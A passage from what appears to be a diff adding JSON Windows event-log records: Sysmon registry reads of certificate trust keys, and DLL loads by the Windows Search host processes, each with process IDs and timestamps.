"process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570916680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570916680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "msidle.dll", + "image_path": "C:\\Windows\\System32\\msidle.dll", + "pid": 3560, + "process_name": "SearchProtocolHost.exe", + "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", + "timestamp": 131883570916060016, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570916680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570916680000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570916680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "propsys.dll", + "image_path": "C:\\Windows\\System32\\propsys.dll", + "pid": 3560, + "process_name": "SearchProtocolHost.exe", + "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", + "timestamp": 131883570916680000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570916680000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570916840000, + "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + 
"process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + 
"timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "SearchFilterHost.exe", + "image_path": "C:\\Windows\\System32\\SearchFilterHost.exe", + "pid": 6608, + "process_name": "SearchFilterHost.exe", + "process_path": "C:\\Windows\\System32\\SearchFilterHost.exe", + "timestamp": 131883570916210000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}" + }, + { + "event_type": "image_load", + "image_name": "tquery.dll", + "image_path": "C:\\Windows\\System32\\tquery.dll", + "pid": 6608, + "process_name": "SearchFilterHost.exe", + "process_path": "C:\\Windows\\System32\\SearchFilterHost.exe", + "timestamp": 
131883570916369984, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}" + }, + { + "event_type": "image_load", + "image_name": "mssprxy.dll", + "image_path": "C:\\Windows\\System32\\mssprxy.dll", + "pid": 3560, + "process_name": "SearchProtocolHost.exe", + "process_path": "C:\\Windows\\System32\\SearchProtocolHost.exe", + "timestamp": 131883570916530000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-00104C8E4E01}" + }, + { + "event_type": "image_load", + "image_name": "mssprxy.dll", + "image_path": "C:\\Windows\\System32\\mssprxy.dll", + "pid": 6608, + "process_name": "SearchFilterHost.exe", + "process_path": "C:\\Windows\\System32\\SearchFilterHost.exe", + "timestamp": 131883570916530000, + "unique_pid": "{42FC7E13-CAE3-5C05-0000-001075934E01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + 
"registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + 
"event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 
2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + 
"registry_value": "CTLs", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570916840000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883570916990000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "image_load", + "image_name": "shell32.dll", + "image_path": "C:\\Windows\\System32\\shell32.dll", + "pid": 3560, + "process_name": "SearchProtocolHost.exe", + "process_path": 
